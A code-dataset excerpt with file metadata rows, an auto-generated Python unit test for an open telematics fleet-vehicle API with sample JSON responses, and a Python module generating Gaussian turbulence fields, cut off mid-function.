| 2,076
| 18,167
| 5.710019
| 0.04817
| 0.057365
| 0.068331
| 0.086469
| 0.864012
| 0.82681
| 0.806394
| 0.782605
| 0.761515
| 0.7589
| 0
| 0.004119
| 0.198217
| 18,167
| 466
| 201
| 38.984979
| 0.809694
| 0.041449
| 0
| 0.512027
| 0
| 0
| 0.188768
| 0.048374
| 0
| 0
| 0
| 0
| 0.127148
| 1
| 0.068729
| false
| 0.089347
| 0.024055
| 0
| 0.113402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
0fb8a921651efd2ce9fc008032222c41fe8f5834
| 13,466
|
py
|
Python
|
sdk/python/v0.1-rc.4/tests/controllers/test_use_case_carrier_custom_business_intelligence_controller.py
|
nmfta-repo/nmfta-opentelematics-prototype
|
729e9391879e273545a4818558677b2e47261f08
|
[
"Apache-2.0"
] | 2
|
2021-12-15T08:37:03.000Z
|
2022-02-11T20:40:42.000Z
|
sdk/python/v0.1-rc.4/tests/controllers/test_use_case_carrier_custom_business_intelligence_controller.py
|
nmfta-repo/nmfta-opentelematics-prototype
|
729e9391879e273545a4818558677b2e47261f08
|
[
"Apache-2.0"
] | 8
|
2019-12-04T22:56:46.000Z
|
2022-02-10T08:23:29.000Z
|
sdk/python/v0.1-rc.4/tests/controllers/test_use_case_carrier_custom_business_intelligence_controller.py
|
nmfta-repo/nmfta-opentelematics-prototype
|
729e9391879e273545a4818558677b2e47261f08
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
opentelematicsapi
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
import jsonpickle
import dateutil.parser
from .controller_test_base import ControllerTestBase
from ..test_helper import TestHelper
from opentelematicsapi.api_helper import APIHelper
class UseCaseCarrierCustomBusinessIntelligenceControllerTests(ControllerTestBase):
@classmethod
def setUpClass(cls):
super(UseCaseCarrierCustomBusinessIntelligenceControllerTests, cls).setUpClass()
cls.controller = cls.api_client.use_case_carrier_custom_business_intelligence
# Clients can retrieve a combination of all vehicle information for all vehicles over a given time period.
#
#**Access Controls**
#
#|Role: |Vehicle Query|Vehicle Follow|Driver Query|Driver Follow|Driver Dispatch|Driver Duty |HR |Admin |
#|-------|-------------|--------------|------------|-------------|---------------|------------|------------|------------|
#|Access:| ALLOW | ALLOW | ALLOW | ALLOW | **DENY** | **DENY** | **DENY** | ALLOW |
def test_get_fleet_vehicle_info_1(self):
# Parameters for the API call
start_time = '2019-04-05T02:04:16Z'
stop_time = '2019-04-05T02:04:16Z'
# Perform the API call through the SDK function
result = self.controller.get_fleet_vehicle_info(start_time, stop_time)
# Test response code
self.assertEquals(self.response_catcher.response.status_code, 200)
# Test headers
expected_headers = {}
expected_headers['content-type'] = None
self.assertTrue(TestHelper.match_headers(expected_headers, self.response_catcher.response.headers))
# Test whether the captured response is as we expected
self.assertIsNotNone(result)
self.assertEqual('{ "coarseVehicleLocationTimeHistories": { "data": [ { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "vehicleId": "21232F297A57A5A743894A0E4A801FC3", "dateTime": "2019-04-05T02:04:16Z", "location": "37.4224764 -122.0842499" } ], "timeResolution": "TIMERESOLUTION_NOT_MAX" }, "flaggedVehicleFaultEvents": [ { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "vehicleId": "21232F297A57A5A743894A0E4A801FC3", "location": "37.4224764 -122.0842499", "eventComment": "event type XXXX, (other details)", "triggeredDate": "2019-04-05T02:04:16Z", "clearedDate": "2019-04-05T02:04:16Z", "occurences": 1, "messageIdentifier": 128, "parameterOrSubsystemIdType": "PIDORSID_PID", "faultCodeParameterorSubsystemId": 0, "sourceAddress": 0, "suspectParameterNumber": 0, "failureModeIdentifier": 0, "urgentFlag": false, "odometer": 0, "engineRpm": 0, "ecmSpeed": 0, "cruiseStatus": { "ccSwitch": false, "ccSetSwitch": false, "ccCoastSwitch": false, "ccClutchSwitch": false, "ccCruiseSwitch": false, "ccResumeSwitch": false, "ccAccelerationSwitch": false, "ccBrakeSwitch": false, "ccSpeed": 1 }, "ignitionStatus": { "ignitionAccessory": false, "ignitionRunContact": false, "ignitionCrankContact": false, "ignitionAidContact": false }, "gpsQuality": "GPSQUALITY_FINELOCK", "clearType": "CLEARTYPE_BYSYSTEMS" } ], "vehiclePerformanceEvents": [ { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "eventStart": "2019-04-05T02:04:16Z", "eventEnd": "2019-04-05T02:04:16Z", "vehicleId": "21232F297A57A5A743894A0E4A801FC3", "eventComment": "performance event type XXXX, (other details)", "hours": 6.28, "thresholds": { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "activeFrom": "2019-04-05T02:04:16Z", "activeTo": "2019-04-05T02:04:16Z", "rpmOverValue": 0, "overSpeedValue": 0, "excessSpeedValue": 0, "longIdleValue": 300, "hiThrottleValue": 0 }, "odometerStart": 0, "odometerEnd": 0, "engineTime": 0, "movingTime": 0, "startFuel": 0, "endFuel": 0, "brakeApplications": 0, "engineLoadStopped": 0, "engineLoadMoving": 0, "headlightTime": 0, "speedGovernorValue": 0, "overRpmTime": 0, "overSpeedTime": 0, "excessSpeedTime": 0, "longIdleTime": 0, "shortIdleTime": 0, "shortIdleCount": 0, "longIdleFuel": 0, "shortIdleFuel": 0, "cruiseEvents": 0, "cruiseTime": 0, "cruiseFuel": 0, "cruiseDistance": 0, "topGearValue": 0, "topGearTime": 0, "topGearFuel": 0, "topGearDistance": 0, "ptoFuel": 0, "ptoTime": 0, "seatBeltTime": 0, "particulateFilterStatus": "`FILTERSTATUS_REGEN_NEEDED\'", "exhaustFluidLevel": 0, "overspeedLowThrottle": 0, "overspeedHiThrottle": 0, "overrpmLowThrottle": 0, "overrpmHiThrottle": 0, "lkaActive": false, "lkaDisable": false, "ldwActive": false, "ldwDisable": false } ], "vehicleFaultCodeEvents": [ { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "vehicleId": "21232F297A57A5A743894A0E4A801FC3", "location": "37.4224764 -122.0842499", "eventComment": "event type XXXX, (other details)", "triggeredDate": "2019-04-05T02:04:16Z", "clearedDate": "2019-04-05T02:04:16Z", "occurences": 1, "messageIdentifier": 128, "parameterOrSubsystemIdType": "PIDORSID_PID", "faultCodeParameterorSubsystemId": 0, "sourceAddress": 0, "suspectParameterNumber": 0, "failureModeIdentifier": 0, "urgentFlag": false, "odometer": 0, "engineRpm": 0, "ecmSpeed": 0, "cruiseStatus": { "ccSwitch": false, "ccSetSwitch": false, "ccCoastSwitch": false, "ccClutchSwitch": false, "ccCruiseSwitch": false, "ccResumeSwitch": false, "ccAccelerationSwitch": false, "ccBrakeSwitch": false, "ccSpeed": 1 }, "ignitionStatus": { "ignitionAccessory": false, "ignitionRunContact": false, "ignitionCrankContact": false, "ignitionAidContact": false }, "gpsQuality": "GPSQUALITY_FINELOCK", "clearType": "CLEARTYPE_BYSYSTEMS" } ]}', self.response_catcher.response.raw_body)
# Clients can follow a feed of a combination of all vehicle information for all vehicles as they are added to the TSP
#system; following is accomplished via polling an endpoint and providing a 'token' which evolves the window of new
#entries with each query in the polling.
#
#**Access Controls**
#
#|Role: |Vehicle Query|Vehicle Follow|Driver Query|Driver Follow|Driver Dispatch|Driver Duty |HR |Admin |
#|-------|-------------|--------------|------------|-------------|---------------|------------|------------|------------|
#|Access:| **DENY** | ALLOW | **DENY** | ALLOW | **DENY** | **DENY** | **DENY** | ALLOW |
def test_follow_fleet_vehicle_info_1(self):
# Parameters for the API call
token = '37A6259CC0C1DAE299A7866489DFF0BD'
# Perform the API call through the SDK function
result = self.controller.follow_fleet_vehicle_info(token)
# Test response code
self.assertEquals(self.response_catcher.response.status_code, 200)
# Test headers
expected_headers = {}
expected_headers['content-type'] = None
self.assertTrue(TestHelper.match_headers(expected_headers, self.response_catcher.response.headers))
# Test whether the captured response is as we expected
self.assertIsNotNone(result)
self.assertEqual('{ "token": "", "feed": { "coarseVehicleLocationTimeHistories": { "data": [ { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "vehicleId": "21232F297A57A5A743894A0E4A801FC3", "dateTime": "2019-04-05T02:04:16Z", "location": "37.4224764 -122.0842499" } ], "timeResolution": "TIMERESOLUTION_NOT_MAX" }, "flaggedVehicleFaultEvents": [ { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "vehicleId": "21232F297A57A5A743894A0E4A801FC3", "location": "37.4224764 -122.0842499", "eventComment": "event type XXXX, (other details)", "triggeredDate": "2019-04-05T02:04:16Z", "clearedDate": "2019-04-05T02:04:16Z", "occurences": 1, "messageIdentifier": 128, "parameterOrSubsystemIdType": "PIDORSID_PID", "faultCodeParameterorSubsystemId": 0, "sourceAddress": 0, "suspectParameterNumber": 0, "failureModeIdentifier": 0, "urgentFlag": false, "odometer": 0, "engineRpm": 0, "ecmSpeed": 0, "cruiseStatus": { "ccSwitch": false, "ccSetSwitch": false, "ccCoastSwitch": false, "ccClutchSwitch": false, "ccCruiseSwitch": false, "ccResumeSwitch": false, "ccAccelerationSwitch": false, "ccBrakeSwitch": false, "ccSpeed": 1 }, "ignitionStatus": { "ignitionAccessory": false, "ignitionRunContact": false, "ignitionCrankContact": false, "ignitionAidContact": false }, "gpsQuality": "GPSQUALITY_FINELOCK", "clearType": "CLEARTYPE_BYSYSTEMS" } ], "vehiclePerformanceEvents": [ { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "eventStart": "2019-04-05T02:04:16Z", "eventEnd": "2019-04-05T02:04:16Z", "vehicleId": "21232F297A57A5A743894A0E4A801FC3", "eventComment": "performance event type XXXX, (other details)", "hours": 6.28, "thresholds": { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "activeFrom": "2019-04-05T02:04:16Z", "activeTo": "2019-04-05T02:04:16Z", "rpmOverValue": 0, "overSpeedValue": 0, "excessSpeedValue": 0, "longIdleValue": 300, "hiThrottleValue": 0 }, "odometerStart": 0, "odometerEnd": 0, "engineTime": 0, "movingTime": 0, "startFuel": 0, "endFuel": 0, "brakeApplications": 0, "engineLoadStopped": 0, "engineLoadMoving": 0, "headlightTime": 0, "speedGovernorValue": 0, "overRpmTime": 0, "overSpeedTime": 0, "excessSpeedTime": 0, "longIdleTime": 0, "shortIdleTime": 0, "shortIdleCount": 0, "longIdleFuel": 0, "shortIdleFuel": 0, "cruiseEvents": 0, "cruiseTime": 0, "cruiseFuel": 0, "cruiseDistance": 0, "topGearValue": 0, "topGearTime": 0, "topGearFuel": 0, "topGearDistance": 0, "ptoFuel": 0, "ptoTime": 0, "seatBeltTime": 0, "particulateFilterStatus": "`FILTERSTATUS_REGEN_NEEDED\'", "exhaustFluidLevel": 0, "overspeedLowThrottle": 0, "overspeedHiThrottle": 0, "overrpmLowThrottle": 0, "overrpmHiThrottle": 0, "lkaActive": false, "lkaDisable": false, "ldwActive": false, "ldwDisable": false } ], "vehicleFaultCodeEvents": [ { "id": "C4CA4238A0B923820DCC509A6F75849B", "providerId": "api.provider.com", "serverTime": "2019-04-05T02:04:16Z", "vehicleId": "21232F297A57A5A743894A0E4A801FC3", "location": "37.4224764 -122.0842499", "eventComment": "event type XXXX, (other details)", "triggeredDate": "2019-04-05T02:04:16Z", "clearedDate": "2019-04-05T02:04:16Z", "occurences": 1, "messageIdentifier": 128, "parameterOrSubsystemIdType": "PIDORSID_PID", "faultCodeParameterorSubsystemId": 0, "sourceAddress": 0, "suspectParameterNumber": 0, "failureModeIdentifier": 0, "urgentFlag": false, "odometer": 0, "engineRpm": 0, "ecmSpeed": 0, "cruiseStatus": { "ccSwitch": false, "ccSetSwitch": false, "ccCoastSwitch": false, "ccClutchSwitch": false, "ccCruiseSwitch": false, "ccResumeSwitch": false, "ccAccelerationSwitch": false, "ccBrakeSwitch": false, "ccSpeed": 1 }, "ignitionStatus": { "ignitionAccessory": false, "ignitionRunContact": false, "ignitionCrankContact": false, "ignitionAidContact": false }, "gpsQuality": "GPSQUALITY_FINELOCK", "clearType": "CLEARTYPE_BYSYSTEMS" } ] }}', self.response_catcher.response.raw_body)
| 160.309524
| 5,269
| 0.595797
| 1,111
| 13,466
| 7.160216
| 0.230423
| 0.022627
| 0.041483
| 0.049026
| 0.893023
| 0.893023
| 0.887995
| 0.880704
| 0.880704
| 0.868385
| 0
| 0.108838
| 0.252191
| 13,466
| 83
| 5,270
| 162.240964
| 0.681132
| 0.11659
| 0
| 0.344828
| 1
| 0.068966
| 0.686213
| 0.159973
| 0
| 0
| 0
| 0
| 0.275862
| 1
| 0.103448
| false
| 0
| 0.172414
| 0
| 0.310345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
ba10fe2ad6528e4b6876ac4e447d30e296c666c6
| 17,420
|
py
|
Python
|
gaussian_fields/turboGen.py
|
jdhare/turbulence_tracing
|
6df5e1da29a3132a488f57b43379d262b7182045
|
[
"MIT"
] | 1
|
2020-12-05T05:43:29.000Z
|
2020-12-05T05:43:29.000Z
|
gaussian_fields/turboGen.py
|
bbw7561135/turbulence_tracing
|
26b980befbcbdbee367e3695a40928841f0cd38a
|
[
"MIT"
] | null | null | null |
gaussian_fields/turboGen.py
|
bbw7561135/turbulence_tracing
|
26b980befbcbdbee367e3695a40928841f0cd38a
|
[
"MIT"
] | 1
|
2020-12-05T05:43:30.000Z
|
2020-12-05T05:43:30.000Z
|
# TURBOGEN collection of method to generate fluctuation density field
# I can imagine to implement 1D, 2D and 3D turbulence generator method
"""
Author: Stefano Merlini
Created: 14/05/2020
"""
# function that computes the turbulence base don a given parameters:
# - grid and domain definitions
# - spectra
# -----------------------------------------------------------------------------------------
# ____ _ _ ____ ____ __ ___ ____ __ _ ____ ____ __ ____ __ ____
# (_ _)/ )( \( _ \( _ \ / \ / __)( __)( ( \( __)( _ \ / _\(_ _)/ \( _ \
# )( ) \/ ( ) / ) _ (( O )( (_ \ ) _) / / ) _) ) // \ )( ( O )) /
# (__) \____/(__\_)(____/ \__/ \___/(____)\_)__)(____)(__\_)\_/\_/(__) \__/(__\_)
# -----------------------------------------------------------------------------------------
#
import numpy as np
# __ ____ ___ __ _ _ ____ ____ __ __ __ _ ___ __ ____
# / \ ___( \ / __) / _\ / )( \/ ___)/ ___)( ) / _\ ( ( \ / __)/ \ / ___)
# (_/ /(___)) D ( ( (_ \/ \) \/ (\___ \\___ \ )( / \/ / ( (__( O )\___ \
# (__) (____/ \___/\_/\_/\____/(____/(____/(__)\_/\_/\_)__) \___)\__/ (____/
# this method is from reference: 1988, Yamasaki, "Digital Generation of Non-Goussian Stochastic Fields"
# Additional reference: Shinozuka, M. and Deodatis, G. (1996)
def gaussian1Dcos(lx, nx, nmodes, wn1, especf):
"""
Given a specific energy spectrum, this function generates
1-D Gaussian field whose energy spectrum corresponds to the
the input energy spectrum.
Parameters:
-----------------------------------------------------------------
lx: float
the domain size in the x-direction.
nx: integer
the number of grid points in the x-direction
nmodes: integer
Number of modes
wn1: float
Smallest wavenumber. Typically dictated by spectrum or domain
espec: function
A callback function representing the energy spectrum in input
-----------------------------------------------------------------
EXAMPLE:
# define spectrum
class k41:
def evaluate(self, k):
espec = pow(k,-5.0/3.0)
return espec
# user input
nx = 64
lx = 1
nmodes = 100
inputspec = 'k41'
whichspect = k41().evaluate
wn1 = 2.0*np.pi/lx
rx = tg.gaussian1D(lx, nx, nmodes, wn1, whichspect)
dx = lx/nx
X = np.arange(0, lx, dx)
plt.plot(X,rx, 'k-', label='computed')
"""
# -----------------------------------------------------------------
# cell size in X-direction
dx = lx/nx
# Compute the highest wavenumber (wavenumber cutoff)
wnn = np.pi/dx
print("This function will generate data up to wavenumber: ", wnn)
# compute the infinitesiaml wavenumber (step dk)
dk = (wnn-wn1)/nmodes
# compute an array of equal-distance wavenumbers at the cells centers
wn = wn1 + 0.5*dk + np.arange(0,nmodes)*dk
dkn = np.ones(nmodes)*dk
# Calculating the proportional factor (using the input power spectrum)
espec = especf(wn)
espec = espec.clip(0.0)
A_m = np.sqrt(2.0*espec*dkn) # for each mode I need a proportional factor ('colouring' the spectrum)
# Generate Random phase angles from a normal distribution between 0 and 2pi
phi = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes)
psi = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes)
kx = wn
# computing the center position of the cell
xc = dx/2.0 + np.arange(0,nx)*dx
_r = np.zeros(nx)
print("Generating 1-D turbulence...")
for i in range(0,nx):
# for every step i along x-direction do the fourier summation
arg1 = kx*xc[i] + phi
bmx = A_m * np.sqrt(2.0) *(np.cos(arg1))
_r[i] = np.sum(bmx)
print("Done! 1-D Turbulence has been generated!")
return _r
# ____ ____ ___ __ _ _ ____ ____ __ __ __ _ ___ __ ____
# (___ \ ___( \ / __) / _\ / )( \/ ___)/ ___)( ) / _\ ( ( \ / __)/ \ / ___)
# / __/(___)) D ( ( (_ \/ \) \/ (\___ \\___ \ )( / \/ / ( (__( O )\___ \
# (____) (____/ \___/\_/\_/\____/(____/(____/(__)\_/\_/\_)__) \___)\__/ (____/
# this method is from reference: 1988, Yamasaki, "Digital Generation of Non-Goussian Stochastic Fields"
# Additional reference: Shinozuka, M. and Deodatis, G. (1996)
def gaussian2Dcos(lx, ly, nx, ny, nmodes, wn1, especf):
"""
Given a specific energy spectrum, this function generates
2-D Gaussian field whose energy spectrum corresponds to the
the input energy spectrum.
Parameters:
----------------------------------------------------------------
lx: float
the domain size in the x-direction.
ly: float
the domain size in the y-direction.
nx: integer
the number of grid points in the x-direction
ny: integer
the number of grid points in the y-direction
nmodes: integer
Number of modes
wn1: float
Smallest wavenumber. Typically dictated by spectrum or domain
espec: function
A callback function representing the energy spectrum in input
-----------------------------------------------------------------
EXAMPLE:
import turboGen as tg
import calcspec
# define spectrum
class k41:
def evaluate(self, k):
espec = pow(k,-5.0/3.0)
return espec
# user input
nx = 64
ny = 64
lx = 1
ly = 1
nmodes = 100
inputspec = 'k41'
whichspect = k41().evaluate
wn1 = min(2.0*np.pi/lx, 2.0*np.pi/ly)
r = tg.gaussian1D(lx, ly, nx, ny, nmodes, wn1, whichspect)
dx = lx/nx
dy = ly/ny
X = np.arange(0, lx, dx)
Y = np.arange(0, ly, dy)
X, Y = np.meshgrid(np.arange(0,lx,dx), np.arange(0,ly,dy))
cp = plt.contourf(X, Y, r)
cb = plt.colorbar(cp)
# I you want to calculate the spectrum
knyquist, wavenumbers, tkespec = calcspec.compute2Dspectum(r, lx, ly, False)
"""
# --------------------------------------------------------------------------
# cell size in X and Y directions
dx = lx/nx
dy = ly/ny
# Compute the highest wavenumber (wavenumber cutoff)
wnn = max(np.pi/dx,np.pi/dy)
print("This function will generate data up to wavenumber: ", wnn)
# compute the infinitesiaml wavenumber (step dk)
dk = (wnn - wn1)/nmodes
# compute an array of equal-distance wavenumbers at the cells centers
wn = wn1 + 0.5*dk + np.arange(0,nmodes)*dk
dkn = np.ones(nmodes)*dk
# Calculating the proportional factor (using the input power spectrum)
espec = especf(wn)
espec = espec.clip(0.0)
A_m = np.sqrt(2.0*espec*(dkn)**2) # for each mode I need a proportional factor ('colouring' the spectrum)
# Generate Random phase angles from a normal distribution between 0 and 2pi
phi = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes)
psi = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes)
theta = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes)
#
kx = np.cos(theta)*wn
ky = np.sin(theta)*wn
# Computing the vector [xc,yc]
xc = dx / 2.0 + np.arange(0, nx) * dx
yc = dy / 2.0 + np.arange(0, ny) * dy
# Looping through 2-Dimensions nx, ny and perfom the Fourier Summation
# computing the center position of the cell
xc = dx/2.0 + np.arange(0,nx)*dx
yc = dy/2.0 + np.arange(0,ny)*dy
_r = np.zeros((nx,ny))
print("Generating 2-D turbulence...")
for j in range(0,ny):
for i in range(0,nx):
# for every step i along x-y direction do the fourier summation
arg1 = kx*xc[i] + ky*yc[j] + phi
arg2 = kx*xc[i] - ky*yc[j] + psi
bm = A_m * np.sqrt(2.0) *(np.cos(arg1) + np.cos(arg2))
_r[i,j] = np.sum(bm)
print("Done! 2-D Turbulence has been generated!")
return _r
# ____ ____ ___ __ _ _ ____ ____ __ __ __ _ ___ __ ____
# ( __ \ ___( \ / __) / _\ / )( \/ ___)/ ___)( ) / _\ ( ( \ / __)/ \ / ___)
# (__ ((___)) D ( ( (_ \/ \) \/ (\___ \\___ \ )( / \/ / ( (__( O )\___ \
# (____/ (____/ \___/\_/\_/\____/(____/(____/(__)\_/\_/\_)__) \___)\__/ (____/
# this method is from reference: 1988, Yamasaki, "Digital Generation of Non-Goussian Stochastic Fields"
# Additional reference: Shinozuka, M. and Deodatis, G. (1996)
def gaussian3Dcos(lx, ly, lz, nx, ny, nz, nmodes, wn1, especf):
"""
Given a specific energy spectrum, this function generates
3-D Gaussian field whose energy spectrum corresponds to the
the input energy spectrum.
Parameters:
----------------------------------------------------------------
lx: float
the domain size in the x-direction.
ly: float
the domain size in the y-direction.
lz: float
the domain size in the z-direction.
nx: integer
the number of grid points in the x-direction
ny: integer
the number of grid points in the y-direction
nz: integer
the number of grid points in the z-direction
nmodes: integer
Number of modes
wn1: float
Smallest wavenumber. Typically dictated by spectrum or domain
espec: function
A callback function representing the energy spectrum in input
-----------------------------------------------------------------
EXAMPLE:
import turboGen as tg
import calcspec
# define spectrum
class k41:
def evaluate(self, k):
espec = pow(k,-5.0/3.0)
return espec
# user input
nx = 64
ny = 64
nz = 64
lx = 1
ly = 1
lz = 1
nmodes = 100
inputspec = 'k41'
whichspect = k41().evaluate
wn1 = min(2.0*np.pi/lx, 2.0*np.pi/ly, 2.0*np.pi/lz)
r = tg.gaussian1D(lx, ly, lz, nx, ny, nz, nmodes, wn1, whichspect)
dx = lx/nx
dy = ly/ny
dz = lz/nz
X = np.arange(0, lx, dx)
Y = np.arange(0, ly, dy)
Z = np.arange(0, lz, dz)
X, Y = np.meshgrid(np.arange(0,lx,dx), np.arange(0,ly,dy))
cp = plt.contourf(X, Y, r(:,:,1))
cb = plt.colorbar(cp)
# I you want to calculate the spectrum
knyquist, wavenumbers, tkespec = calcspec.compute3Dspectum(r, lx, ly, lz, False)
"""
# --------------------------------------------------------------------------
# cell size in X, Y, Z directions
dx = lx/nx
dy = ly/ny
dz = lz/nz
# Compute the highest wavenumber (wavenumber cutoff)
wnn = max(np.pi/dx,np.pi/dy,np.pi/dz)
print("This function will generate data up to wavenumber: ", wnn)
# compute the infinitesiaml wavenumber (step dk)
dk = (wnn - wn1)/nmodes
# compute an array of equal-distance wavenumbers at the cells centers
wn = wn1 + 0.5*dk + np.arange(0,nmodes)*dk
dkn = np.ones(nmodes)*dk
# Calculating the proportional factor (using the input power spectrum)
espec = especf(wn)
espec = espec.clip(0.0)
A_m = np.sqrt(2.0*espec*(dkn)**3) # for each mode I need a proportional factor ('colouring' the spectrum)
# Generate Random phase angles from a normal distribution between 0 and 2pi
psi_1 = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes)
psi_2 = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes)
psi_3 = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes)
psi_4 = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes)
theta = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes)
phi = 2.0*np.pi*np.random.uniform(0.0,1.0,nmodes)
#
kx = np.sin(theta) * np.cos(phi) * wn;
ky = np.sin(theta) * np.sin(phi) * wn;
kz = np.cos(theta) * wn;
# Computing the vector [xc,yc,zc]
xc = dx / 2.0 + np.arange(0, nx) * dx
yc = dy / 2.0 + np.arange(0, ny) * dy
zc = dz / 2.0 + np.arange(0, nz) * dz
# Looping through 3-Dimensions nx, ny, nz and perfom the Fourier Summation
# computing the center position of the cell
xc = dx/2.0 + np.arange(0,nx)*dx
yc = dy/2.0 + np.arange(0,ny)*dy
zc = dz/2.0 + np.arange(0,nz)*dz
_r = np.zeros((nx,ny,nz))
print("Generating 3-D turbulence...")
for k in range(0,nz):
for j in range(0,ny):
for i in range(0,nx):
# for every step i along x-y-z direction do the fourier summation
arg1 = kx*xc[i] + ky*yc[j] + kz*zc[k] + psi_1
arg2 = kx*xc[i] + ky*yc[j] - kz*zc[k] + psi_2
arg3 = kx*xc[i] - ky*yc[j] + kz*zc[k] + psi_3
arg4 = kx*xc[i] - ky*yc[j] - kz*zc[k] + psi_4
bm = A_m * np.sqrt(2.0) * (np.cos(arg1) + np.cos(arg2) + np.cos(arg3) + np.cos(arg4))
_r[i,j,k] = np.sum(bm)
print("Done! 3-D Turbulence has been generated!")
return _r
def gaussian1D_FFT(N, k_func):
"""A FFT based generator for scalar gaussian fields in 1D
Reference:Timmer, J and König, M. “On Generating Power Law Noise.” Astronomy & Astrophysics 300 (1995):
1–30. https://doi.org/10.1017/CBO9781107415324.004.
Arguments:
L_drive {float} -- Driving length scale
N {int} -- size of domain will be (2*N+1)
k_func {function} -- a function which takes an input k
Returns:
signal {1D array of floats} -- a realisation of a 1D Gaussian process.
Example:
L_drive = 1e-2
def power_spectrum(k,a):
return k**-a
def k41(k):
return power_spectrum(k, 5/3)
sig = gaussian1D_FFT( N, k41)
fig,ax = plt.subplots()
x = np.linspace(-N,N, 2*N+1)
ax.plot(x, sig)
"""
M=2*N+1
k=np.fft.fftfreq(M) #these are the frequencies, starting from 0 up to f_max, then -f_max to 0.
K=np.sqrt(k**2)
K=np.fft.fftshift(K)#numpy convention, highest frequencies at the centre
Wr=np.random.randn(M) # random number from Gaussian for both
Wi=np.random.randn(M) # real and imaginary components
Wr = Wr + np.flip(Wr) #f(-k)=f*(k)
Wi = Wi - np.flip(Wi)
W = Wr+1j*Wi
F = W*np.sqrt(k_func(K)) # power spectra follows power law, so sqrt here.
F_shift=np.fft.ifftshift(F)
F_shift[0]=0 # 0 mean
signal=np.fft.ifftn(F_shift)
return signal.real
def gaussian2D_FFT(N, k_func):
"""A FFT based generator for scalar gaussian fields in 1D
Reference:Timmer, J and König, M. “On Generating Power Law Noise.” Astronomy & Astrophysics 300 (1995):
1–30. https://doi.org/10.1017/CBO9781107415324.004.
Arguments:
L_drive {float} -- Driving length scale
N {int} -- size of domain will be (2*N+1)^2
k_func {function} -- a function which takes an input k
Returns:
signal {2D array of floats} -- a realisation of a 2D Gaussian process.
Example:
N = 100
L_drive = 1e-2
def power_spectrum(k,a):
return k**-a
def k41(k):
return power_spectrum(k, 5/3)
sig = gaussian2D_FFT(N, k41)
fig,ax=plt.subplots()
ax.imshow(sig, cmap='bwr', extent=[-N,N,-N,N])
"""
M=2*N+1
k=np.fft.fftfreq(M) #these are the frequencies, starting from 0 up to f_max, then -f_max to 0.
KX,KY=np.meshgrid(k,k)
K=np.sqrt(KX**2+KY**2)
K=np.fft.fftshift(K)#numpy convention, highest frequencies at the centre
Wr=np.random.randn(M, M) # random number from Gaussian for both
Wi=np.random.randn(M, M) # real and imaginary components
Wr = Wr + np.flip(Wr) #f(-k)=f*(k)
Wi = Wi - np.flip(Wi)
W = Wr+1j*Wi
F = W*np.sqrt(k_func(K)) # power spectra follows power law, so sqrt here.
F_shift=np.fft.ifftshift(F)
F_shift[0,0]=0 # 0 mean
signal=np.fft.ifftn(F_shift)
return signal.real
def gaussian3D_FFT(N, k_func):
"""A FFT based generator for scalar gaussian fields in 1D
Reference:Timmer, J and König, M. “On Generating Power Law Noise.” Astronomy & Astrophysics 300 (1995):
1–30. https://doi.org/10.1017/CBO9781107415324.004.
Arguments:
N {int} -- size of domain will be (2*N+1)^3
k_func {function} -- a function which takes an input k
Returns:
signal {3D array of floats} -- a realisation of a 3D Gaussian process.
Example:
N = 100
def power_spectrum(k,a):
return k**-a
def k41(k):
return power_spectrum(k, 5/3)
sig = gaussian3D_FFT(N, k41)
fig,ax=plt.subplots(3,3, figsize=(8,8), sharex=True, sharey=True)
ax=ax.flatten()
for a in ax:
r=np.random.randint(0,ny)
d=sig[r,:,:]
a.imshow(d, cmap='bwr', extent=[-N,N,-N,N])
a.set_title("y="+str(r)) """
M = 2*N+1
k = np.fft.fftfreq(M) #these are the frequencies, starting from 0 up to f_max, then -f_max to 0.
KX,KY,KZ = np.meshgrid(k,k,k)
K = np.sqrt(KX**2+KY**2+KZ**2)
K = np.fft.fftshift(K)#numpy convention, highest frequencies at the centre
Wr = np.random.randn(M, M, M) # random number from Gaussian for both
Wi = np.random.randn(M, M, M) # real and imaginary components
Wr = Wr + np.flip(Wr) #f(-k)=f*(k)
Wi = Wi - np.flip(Wi)
W = Wr+1j*Wi
F = W*np.sqrt(k_func(K)) # power spectra follows power law, so sqrt here.
F_shift = np.fft.ifftshift(F)
